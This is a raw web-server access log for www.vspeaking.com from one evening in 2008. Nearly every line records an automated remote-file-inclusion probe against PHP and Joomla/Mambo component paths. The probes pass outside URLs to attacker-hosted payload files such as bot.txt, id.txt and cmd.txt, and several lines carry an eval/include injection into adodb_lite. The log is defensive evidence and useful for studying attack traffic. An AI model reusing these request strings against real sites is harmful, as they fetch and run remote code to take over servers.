190.196.2.205 - - [09/Nov/2008:18:08:01 -0800] "GET /logs/access_080804.log//bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
190.196.2.205 - - [09/Nov/2008:18:08:05 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
80.67.22.215 - - [09/Nov/2008:18:08:09 -0800] "GET /logs/access_080804.log//bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.22.215 - - [09/Nov/2008:18:08:10 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.22.215 - - [09/Nov/2008:18:08:10 -0800] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
190.41.11.250 - - [09/Nov/2008:18:08:30 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
190.196.2.205 - - [09/Nov/2008:18:08:50 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
80.67.20.101 - - [09/Nov/2008:18:09:05 -0800] "GET /logs/access_080804.log//bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.20.101 - - [09/Nov/2008:18:09:06 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.20.101 - - [09/Nov/2008:18:09:06 -0800] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
222.122.45.116 - - [09/Nov/2008:18:11:09 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geocities.com/shirohige_team/shirohige/zixidv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
222.122.45.116 - - [09/Nov/2008:18:11:10 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geocities.com/shirohige_team/shirohige/zixidv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
193.84.183.38 - - [09/Nov/2008:18:11:13 -0800] "GET /logs/access_080804.log//bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
193.84.183.38 - - [09/Nov/2008:18:11:17 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
193.84.183.38 - - [09/Nov/2008:18:11:17 -0800] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
200.68.95.210 - - [09/Nov/2008:18:11:57 -0800] "GET /logs/access_080825.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://face.kapanlagi.com/album/PhotoAlbum/galeri/album1212/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.vspeaking.com"
190.41.11.250 - - [09/Nov/2008:18:12:57 -0800] "GET /logs/access_080804.log//bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
190.41.11.250 - - [09/Nov/2008:18:12:57 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
190.41.11.250 - - [09/Nov/2008:18:12:57 -0800] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
209.85.108.8 - - [09/Nov/2008:18:13:42 -0800] "GET /logs/access_080901.log//index.php?DOCUMENT_ROOT=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
209.85.108.8 - - [09/Nov/2008:18:13:42 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
209.85.108.8 - - [09/Nov/2008:18:13:42 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
190.196.2.205 - - [09/Nov/2008:18:14:11 -0800] "GET /logs/access_080804.log//bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
190.196.2.205 - - [09/Nov/2008:18:14:13 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
190.196.2.205 - - [09/Nov/2008:18:14:15 -0800] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
209.85.108.8 - - [09/Nov/2008:18:15:51 -0800] "GET /logs/access_080915.log//index.php?DOCUMENT_ROOT=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
67.76.163.60 - - [09/Nov/2008:18:16:32 -0800] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.deepinsidethemind.com//plugins/safehtml/gif/blast.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
67.76.163.60 - - [09/Nov/2008:18:16:32 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.deepinsidethemind.com//plugins/safehtml/gif/blast.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
67.76.163.60 - - [09/Nov/2008:18:16:32 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.deepinsidethemind.com//plugins/safehtml/gif/blast.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
88.80.202.189 - - [09/Nov/2008:18:16:42 -0800] "GET /logs/access_080901.log//index.php?DOCUMENT_ROOT=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
88.80.202.189 - - [09/Nov/2008:18:16:42 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
88.80.202.189 - - [09/Nov/2008:18:16:43 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
88.80.202.189 - - [09/Nov/2008:18:16:43 -0800] "GET /logs/access_080901.log//index.php?DOCUMENT_ROOT=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
88.80.202.189 - - [09/Nov/2008:18:16:43 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
88.80.202.189 - - [09/Nov/2008:18:16:44 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
94.23.10.29 - - [09/Nov/2008:18:21:16 -0800] "GET /logs/access_080804.log/index.php?sourcedir=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
88.80.202.189 - - [09/Nov/2008:18:21:24 -0800] "GET /logs/access_080915.log//index.php?DOCUMENT_ROOT=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
88.80.202.189 - - [09/Nov/2008:18:21:27 -0800] "GET /logs/access_080915.log//index.php?DOCUMENT_ROOT=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
80.247.76.180 - - [09/Nov/2008:18:21:38 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://62.141.54.164/.file/ghx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
80.247.76.180 - - [09/Nov/2008:18:21:38 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://62.141.54.164/.file/ghx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
208.182.249.8 - - [09/Nov/2008:18:25:02 -0800] "GET /?installed_config_file=http://www.car-action.com/rpm9/data/board/rhs/list.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.vspeaking.com"
208.182.249.8 - - [09/Nov/2008:18:25:02 -0800] "GET /logs//?installed_config_file=http://www.car-action.com/rpm9/data/board/rhs/list.txt?? HTTP/1.1" 200 2230 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.vspeaking.com"
114.141.2.7 - - [09/Nov/2008:18:28:26 -0800] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.vspeaking.com"
114.141.2.7 - - [09/Nov/2008:18:28:26 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.vspeaking.com"
114.141.2.7 - - [09/Nov/2008:18:28:26 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.vspeaking.com"
114.141.2.7 - - [09/Nov/2008:18:28:26 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.vspeaking.com"
114.141.2.7 - - [09/Nov/2008:18:28:26 -0800] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.vspeaking.com"
114.141.2.7 - - [09/Nov/2008:18:28:26 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.vspeaking.com"
114.141.2.7 - - [09/Nov/2008:18:28:27 -0800] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.vspeaking.com"
114.141.2.7 - - [09/Nov/2008:18:28:27 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.vspeaking.com"
114.141.2.7 - - [09/Nov/2008:18:28:27 -0800] "GET /logs/access.log%22%20class=%22neww%22%20target=%22_blank%22%20title=%22Im%20neuen%20Fenster%20öffnen/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.vspeaking.com"
114.141.2.7 - - [09/Nov/2008:18:28:27 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.vspeaking.com"
114.141.2.7 - - [09/Nov/2008:18:28:32 -0800] "GET /logs/access.log%22%20class=%22neww%22%20target=%22_blank%22%20title=%22Im%20neuen%20Fenster%20öffnen/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.vspeaking.com"
114.141.2.7 - - [09/Nov/2008:18:28:33 -0800] "GET /logs/access.log%22%20class=%22neww%22%20target=%22_blank%22%20title=%22Im%20neuen%20Fenster%20öffnen/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.vspeaking.com"
114.141.2.7 - - [09/Nov/2008:18:31:24 -0800] "GET /logs/access_080915.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.vspeaking.com"
114.141.2.7 - - [09/Nov/2008:18:31:34 -0800] "GET /logs/access_080915.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.vspeaking.com"
114.141.2.7 - - [09/Nov/2008:18:31:37 -0800] "GET /logs/access_080915.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.vspeaking.com"
114.141.2.7 - - [09/Nov/2008:18:33:44 -0800] "GET /logs/access_080818.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.vspeaking.com"
114.141.2.7 - - [09/Nov/2008:18:33:44 -0800] "GET /logs/access_080818.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.vspeaking.com"
114.141.2.7 - - [09/Nov/2008:18:33:48 -0800] "GET /logs/access_080818.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.vspeaking.com"
213.202.100.144 - - [09/Nov/2008:18:36:23 -0800] "GET /logs/access.log%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bentahan.com.ph/pinoyster/backup/bot.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
213.202.100.144 - - [09/Nov/2008:18:36:23 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bentahan.com.ph/pinoyster/backup/bot.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
213.202.100.144 - - [09/Nov/2008:18:36:23 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bentahan.com.ph/pinoyster/backup/bot.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
66.135.37.24 - - [09/Nov/2008:18:37:32 -0800] "GET /logs/mosConfig_absolute_path.%22/mambots/content/multithumb/http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
66.135.37.24 - - [09/Nov/2008:18:37:32 -0800] "GET /mosConfig_absolute_path.%22/mambots/content/multithumb/http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
38.108.180.89 - - [09/Nov/2008:18:43:28 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "www.vspeaking.com"
38.108.180.89 - - [09/Nov/2008:18:43:30 -0800] "GET /?M=A HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "www.vspeaking.com"
85.214.37.182 - - [09/Nov/2008:18:50:01 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bentahan.com.ph//stores/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.vspeaking.com"
85.214.37.182 - - [09/Nov/2008:18:50:03 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bentahan.com.ph//stores/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.vspeaking.com"
216.55.149.41 - - [09/Nov/2008:18:50:17 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://bentahan.com.ph//stores/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.vspeaking.com"
209.51.152.234 - - [09/Nov/2008:18:54:01 -0800] "GET /logs/access.log//index.php?body=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
209.51.152.234 - - [09/Nov/2008:18:54:01 -0800] "GET /index.php?body=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
209.51.152.234 - - [09/Nov/2008:18:54:01 -0800] "GET /logs//index.php?body=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
124.81.96.76 - - [09/Nov/2008:18:54:35 -0800] "GET /errors.php?error=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
211.115.110.161 - - [09/Nov/2008:18:58:43 -0800] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
222.122.45.116 - - [09/Nov/2008:19:01:09 -0800] "GET /logs/access_080825.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geocities.com/shirohige_team/shirohige/zixidv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
200.101.66.123 - - [09/Nov/2008:19:10:30 -0800] "GET /logs/homepage.php?sel=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
200.101.66.123 - - [09/Nov/2008:19:10:30 -0800] "GET /logs/access_080901.log/homepage.php?sel=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
200.101.66.123 - - [09/Nov/2008:19:10:30 -0800] "GET /homepage.php?sel=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
98.193.117.182 - - [09/Nov/2008:19:10:44 -0800] "GET /logs/access_080901.log/homepage.php?sel=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
98.193.117.182 - - [09/Nov/2008:19:10:44 -0800] "GET /homepage.php?sel=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
98.193.117.182 - - [09/Nov/2008:19:10:44 -0800] "GET /logs/homepage.php?sel=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
200.101.66.123 - - [09/Nov/2008:19:10:56 -0800] "GET /logs/access_080825.log/homepage.php?sel=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
98.193.117.182 - - [09/Nov/2008:19:11:09 -0800] "GET /logs/access_080825.log/homepage.php?sel=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
200.101.66.123 - - [09/Nov/2008:19:11:19 -0800] "GET /logs/access_080901.log%20/homepage.php?sel=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
98.193.117.182 - - [09/Nov/2008:19:11:44 -0800] "GET /logs/access_080901.log%20/homepage.php?sel=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
62.87.154.41 - - [09/Nov/2008:19:15:04 -0800] "GET /include/lib.inc.php?site_path=http://www.minart.org/bbs/data/a3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
62.87.154.41 - - [09/Nov/2008:19:15:06 -0800] "GET /logs/access.log%20%20//include/lib.inc.php?site_path=http://www.minart.org/bbs/data/a3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
62.87.154.41 - - [09/Nov/2008:19:15:07 -0800] "GET /logs//include/lib.inc.php?site_path=http://www.minart.org/bbs/data/a3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.228.254.123 - - [09/Nov/2008:19:16:10 -0800] "GET //vwar/backup/errors.php?error=http://www.eacpfr.com/WebCalendar//tools/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
200.101.66.123 - - [09/Nov/2008:19:16:47 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
200.101.66.123 - - [09/Nov/2008:19:16:47 -0800] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
200.101.66.123 - - [09/Nov/2008:19:16:47 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
124.81.96.76 - - [09/Nov/2008:19:16:57 -0800] "GET //vwar/backup/errors.php?error=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
98.193.117.182 - - [09/Nov/2008:19:19:30 -0800] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
98.193.117.182 - - [09/Nov/2008:19:19:30 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
98.193.117.182 - - [09/Nov/2008:19:19:30 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.190.200.18 - - [09/Nov/2008:19:19:40 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://geocities.com/grz_57/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
80.190.200.18 - - [09/Nov/2008:19:19:40 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://geocities.com/grz_57/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
195.228.254.123 - - [09/Nov/2008:19:27:32 -0800] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.eacpfr.com/WebCalendar//tools/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
195.228.254.123 - - [09/Nov/2008:19:27:32 -0800] "GET /logs///vwar/backup/errors.php?error=http://www.eacpfr.com/WebCalendar//tools/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
213.165.84.215 - - [09/Nov/2008:19:29:15 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://fantalaranja.t35.com/id44.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.165.84.215 - - [09/Nov/2008:19:29:15 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://fantalaranja.t35.com/id44.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.165.84.215 - - [09/Nov/2008:19:29:15 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://fantalaranja.t35.com/id44.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
64.79.215.62 - - [09/Nov/2008:19:30:23 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.alldogsgym.com/images/headers/ide.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
64.79.215.62 - - [09/Nov/2008:19:30:23 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.alldogsgym.com/images/headers/ide.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
